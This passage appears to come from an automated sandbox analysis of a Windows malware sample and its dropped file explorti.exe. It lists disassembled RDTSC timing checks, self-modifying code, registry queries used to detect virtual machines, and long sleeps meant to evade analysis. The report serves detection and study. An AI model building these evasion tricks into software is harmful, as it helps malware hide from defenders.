Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50606ED second address: 506072A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [778165FCh] 0x0000000d jmp 00007FBF8C4F2A59h 0x00000012 test eax, eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edx 0x00000018 pop esi 0x00000019 jmp 00007FBF8C4F2A4Fh 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 506072A second address: 50607E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FBFFEC252A5h 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 call 00007FBF8C4F2098h 0x00000018 pushfd 0x00000019 jmp 00007FBF8C4F2092h 0x0000001e adc cl, 00000008h 0x00000021 jmp 00007FBF8C4F208Bh 0x00000026 popfd 0x00000027 pop esi 0x00000028 popad 0x00000029 mov ecx, eax 0x0000002b jmp 00007FBF8C4F208Fh 0x00000030 xor eax, dword ptr [ebp+08h] 0x00000033 jmp 00007FBF8C4F208Fh 0x00000038 and ecx, 1Fh 0x0000003b pushad 0x0000003c mov bx, cx 0x0000003f pushfd 0x00000040 jmp 00007FBF8C4F2090h 0x00000045 or ah, FFFFFFC8h 0x00000048 jmp 00007FBF8C4F208Bh 0x0000004d popfd 0x0000004e popad 0x0000004f ror eax, cl 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50607E0 second address: 50607E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50607E4 second address: 50607E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50607E8 second address: 50607EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50607EE second address: 506080B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F2099h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 506080B second address: 506080F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 506080F second address: 506084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx esi, dx 0x0000000f pushfd 0x00000010 jmp 00007FBF8C4F208Bh 0x00000015 sbb si, 141Eh 0x0000001a jmp 00007FBF8C4F2099h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 506084A second address: 50608A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBF8C4F2A57h 0x00000009 and ecx, 1052BE2Eh 0x0000000f jmp 00007FBF8C4F2A59h 0x00000014 popfd 0x00000015 movzx eax, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b retn 0004h 0x0000001e nop 0x0000001f mov esi, eax 0x00000021 lea eax, dword ptr [ebp-08h] 0x00000024 xor esi, dword ptr [006D2014h] 0x0000002a push eax 0x0000002b push eax 0x0000002c push eax 0x0000002d lea eax, dword ptr [ebp-10h] 0x00000030 push eax 0x00000031 call 00007FBF90EC3304h 0x00000036 push FFFFFFFEh 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FBF8C4F2A56h 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50608A8 second address: 5060916 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F208Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007FBF8C4F2096h 0x0000000f ret 0x00000010 nop 0x00000011 push eax 0x00000012 call 00007FBF90EC297Eh 0x00000017 mov edi, edi 0x00000019 pushad 0x0000001a mov ebx, ecx 0x0000001c push ecx 0x0000001d pop esi 0x0000001e popad 0x0000001f push esi 0x00000020 pushad 0x00000021 movzx esi, bx 0x00000024 movsx ebx, cx 0x00000027 popad 0x00000028 mov dword ptr [esp], ebp 0x0000002b jmp 00007FBF8C4F2092h 0x00000030 mov ebp, esp 0x00000032 jmp 00007FBF8C4F2090h 0x00000037 pop ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FBF8C4F208Ah 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5060916 second address: 506091C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 506091C second address: 5060922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010008 second address: 501000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 501000C second address: 501001E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F208Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 501001E second address: 5010030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F2A4Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010030 second address: 5010119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F208Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FBF8C4F2096h 0x00000011 push eax 0x00000012 jmp 00007FBF8C4F208Bh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 movzx eax, di 0x0000001c pushfd 0x0000001d jmp 00007FBF8C4F2091h 0x00000022 or eax, 18DC5716h 0x00000028 jmp 00007FBF8C4F2091h 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FBF8C4F208Ch 0x00000038 or ax, 0338h 0x0000003d jmp 00007FBF8C4F208Bh 0x00000042 popfd 0x00000043 pushfd 0x00000044 jmp 00007FBF8C4F2098h 0x00000049 jmp 00007FBF8C4F2095h 0x0000004e popfd 0x0000004f popad 0x00000050 and esp, FFFFFFF8h 0x00000053 jmp 00007FBF8C4F208Eh 0x00000058 xchg eax, ecx 0x00000059 jmp 00007FBF8C4F2090h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FBF8C4F208Dh 0x00000068 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010119 second address: 501012E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 501020B second address: 5010250 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 mov di, cx 0x0000000c pushad 0x0000000d call 00007FBF8C4F2098h 0x00000012 pop eax 0x00000013 popad 0x00000014 popad 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 mov edi, ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d call 00007FBF8C4F2094h 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010250 second address: 50102B1 instructions: 0x00000000 rdtsc 0x00000002 call 00007FBF8C4F2A4Bh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esp 0x0000000c jmp 00007FBF8C4F2A54h 0x00000011 mov dword ptr [esp], edi 0x00000014 jmp 00007FBF8C4F2A50h 0x00000019 test esi, esi 0x0000001b pushad 0x0000001c pushad 0x0000001d mov bx, si 0x00000020 popad 0x00000021 mov eax, ebx 0x00000023 popad 0x00000024 je 00007FBFFEC70DC7h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FBF8C4F2A53h 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50102B1 second address: 50102CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50102CE second address: 5010306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF8C4F2A57h 0x00000008 movzx eax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e cmp dword ptr [esi+08h], DDEEDDEEh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FBF8C4F2A4Dh 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010306 second address: 501030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 501030A second address: 5010310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010310 second address: 50103A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F208Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FBFFEC70391h 0x0000000f jmp 00007FBF8C4F2090h 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FBF8C4F208Eh 0x0000001e adc si, A528h 0x00000023 jmp 00007FBF8C4F208Bh 0x00000028 popfd 0x00000029 mov ch, BAh 0x0000002b popad 0x0000002c or edx, dword ptr [ebp+0Ch] 0x0000002f jmp 00007FBF8C4F208Bh 0x00000034 test edx, 61000000h 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FBF8C4F208Bh 0x00000043 or ah, 0000001Eh 0x00000046 jmp 00007FBF8C4F2099h 0x0000004b popfd 0x0000004c mov si, F8E7h 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50103A2 second address: 50103CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FBF8C4F2A53h 0x00000008 pop esi 0x00000009 mov al, dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007FBFFEC70D10h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50103CA second address: 50103CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50103CE second address: 50103D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50103D2 second address: 50103D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50103D8 second address: 501041C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1FE27324h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f pushad 0x00000010 movsx edi, cx 0x00000013 pushfd 0x00000014 jmp 00007FBF8C4F2A52h 0x00000019 sub cx, F1D8h 0x0000001e jmp 00007FBF8C4F2A4Bh 0x00000023 popfd 0x00000024 popad 0x00000025 jne 00007FBFFEC70CD7h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 501041C second address: 5010420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010420 second address: 5010426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50007C2 second address: 5000828 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBF8C4F2090h 0x00000009 and ch, FFFFFFC8h 0x0000000c jmp 00007FBF8C4F208Bh 0x00000011 popfd 0x00000012 mov edi, ecx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FBF8C4F2097h 0x00000021 and si, 1CBEh 0x00000026 jmp 00007FBF8C4F2099h 0x0000002b popfd 0x0000002c mov ah, A2h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000828 second address: 500085C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBF8C4F2A58h 0x00000009 jmp 00007FBF8C4F2A55h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000974 second address: 50009FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 8356h 0x00000007 pushfd 0x00000008 jmp 00007FBF8C4F2097h 0x0000000d sub ecx, 7A4D37DEh 0x00000013 jmp 00007FBF8C4F2099h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], esi 0x0000001f jmp 00007FBF8C4F208Eh 0x00000024 mov esi, dword ptr [ebp+08h] 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FBF8C4F208Eh 0x0000002e add esi, 59998F08h 0x00000034 jmp 00007FBF8C4F208Bh 0x00000039 popfd 0x0000003a movzx esi, bx 0x0000003d popad 0x0000003e mov ebx, 00000000h 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50009FB second address: 50009FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50009FF second address: 5000A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000A05 second address: 5000A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000A0B second address: 5000A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000A0F second address: 5000A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000A13 second address: 5000A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF8C4F2099h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000A38 second address: 5000A62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FBFFEC78387h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBF8C4F2A4Dh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000A62 second address: 5000AC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov bh, cl 0x00000013 mov bx, CE9Ch 0x00000017 popad 0x00000018 mov ecx, esi 0x0000001a pushad 0x0000001b mov esi, ebx 0x0000001d mov di, 90A0h 0x00000021 popad 0x00000022 je 00007FBFFEC77999h 0x00000028 jmp 00007FBF8C4F208Fh 0x0000002d test byte ptr [77816968h], 00000002h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FBF8C4F2095h 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000AC3 second address: 5000B0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FBFFEC78324h 0x0000000f pushad 0x00000010 mov al, 1Dh 0x00000012 mov dx, 6F8Ch 0x00000016 popad 0x00000017 mov edx, dword ptr [ebp+0Ch] 0x0000001a pushad 0x0000001b mov bh, 24h 0x0000001d call 00007FBF8C4F2A4Ah 0x00000022 pop edi 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 jmp 00007FBF8C4F2A4Ch 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000B0C second address: 5000B12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000B12 second address: 5000B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000B18 second address: 5000B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000B1C second address: 5000B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000B20 second address: 5000BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007FBF8C4F208Dh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 jmp 00007FBF8C4F208Ch 0x00000015 pushfd 0x00000016 jmp 00007FBF8C4F2092h 0x0000001b add esi, 0CD05798h 0x00000021 jmp 00007FBF8C4F208Bh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007FBF8C4F2099h 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push edx 0x00000033 pop esi 0x00000034 pushfd 0x00000035 jmp 00007FBF8C4F208Fh 0x0000003a or cx, DDBEh 0x0000003f jmp 00007FBF8C4F2099h 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000BBA second address: 5000C3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBF8C4F2A57h 0x00000009 and ah, FFFFFFCEh 0x0000000c jmp 00007FBF8C4F2A59h 0x00000011 popfd 0x00000012 jmp 00007FBF8C4F2A50h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+14h] 0x0000001d pushad 0x0000001e mov edx, esi 0x00000020 pushfd 0x00000021 jmp 00007FBF8C4F2A4Ah 0x00000026 add si, 0B78h 0x0000002b jmp 00007FBF8C4F2A4Bh 0x00000030 popfd 0x00000031 popad 0x00000032 push dword ptr [ebp+10h] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FBF8C4F2A50h 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000C3F second address: 5000C45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000CC5 second address: 5000CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000CCB second address: 5000CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010B00 second address: 5010B06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010B06 second address: 5010B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010B0A second address: 5010B2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bl, 4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 mov bx, cx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5090733 second address: 5090739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5090739 second address: 509073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 509073D second address: 509075B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, ax 0x0000000f jmp 00007FBF8C4F208Eh 0x00000014 popad 0x00000015 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Special instruction interceptor: First address: 6DEB9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Special instruction interceptor: First address: 6DEC64 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Special instruction interceptor: First address: 88958E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Special instruction interceptor: First address: 6DC222 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Special instruction interceptor: First address: 917DD5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: C5EB9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: C5EC64 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: E0958E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: C5C222 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: E97DD5 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Code function: 9_2_05080C45 rdtsc 9_2_05080C45
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Window / User API: threadDelayed 483 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3303 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 2138 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 856 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 379 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 3018 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Window / User API: threadDelayed 383 Jump to behavior
Found dropped PE file which has not been started or loaded
